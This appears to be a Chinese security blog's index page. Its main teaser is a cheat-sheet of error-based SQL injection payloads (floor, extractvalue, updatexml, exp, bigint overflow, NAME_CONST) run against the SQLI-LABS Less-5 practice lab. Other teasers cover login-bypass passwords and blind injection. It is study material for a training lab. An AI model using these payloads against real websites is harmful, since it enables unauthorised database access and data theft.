今天写了下红帽杯要交的wp，颓废了一会儿，喷了一发iscc，然后ak了iscc目前放的题。开始今天的 阅读更多…

昨天不知道怎么了忘记发出去了，和今天的合起来一起发23333333 今天国赛，体验了一把被二进制大手 阅读更多…

院科协换届…10点才去大活打开电脑…修炼第一天怕是只能看个题了… 阅读更多…

0x00.序言

关于报错注入的话虽然我在我之前的文章里面写了一些，但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。

ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记（二）》中已经详细说过了，如果不懂可以去看看。

ps的ps：这里以SQLI-LABS的LESS-5为例题作为示范。

0x01.floor()报错注入

http://43.247.91.228:84/Less-5/?id=1′ union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a–+

0x02.extractvalue()报错注入

原理：xpath 函数报错注入

ps：(有长度限制,最长32位)

http://43.247.91.228:84/Less-5/?id=1′ and extractvalue(1,concat(0x7e,(select database()),0x7e))–+

0x03.updatexml()报错注入

ps：(有长度限制,最长32位)

http://43.247.91.228:84/Less-5/?id=1′ and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+

 

0x04.exp()报错注入

原理：利用double 数值类型超出范围进行报错注入

http://43.247.91.228:84/Less-5/?id=1′ union select (exp(~(select * FROM(SELECT USER())a))),2,3–+

0x05.利用！来溢出报错注入

原理：利用bigint 溢出进行报错注入

http://43.247.91.228:84/Less-5/?id=1′ union select (!(select * from (select user())x) – ~0),2,3–+

0x06.NAME_CONST()

原理：利用数据的重复性。

http://43.247.91.228:84/Less-5/?id=1’union select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x –+

0x07.总结

（更多…）

写在前面：今天介绍的是post注入。 自己总结了一些万能密码： 1：”or &#8220 阅读更多…

写在前面：今天介绍基于时间的盲注。 我们利用延时注入进行，同时id 参数进行的是一定的处理。主要使用 阅读更多…

写在前面： 导入导出相关操作的讲解： 1、load_file()导出文件 Load_file(fil 阅读更多…

写在前面：今天的重点是盲注。 首先介绍一下sql注入截取字符串常用函数有三大法宝。 mid(),su 阅读更多…

写在前面：作为一个萌新，想自己搭一个sqli-labs，中间历经了无数艰难，我win10系统用的是x 阅读更多…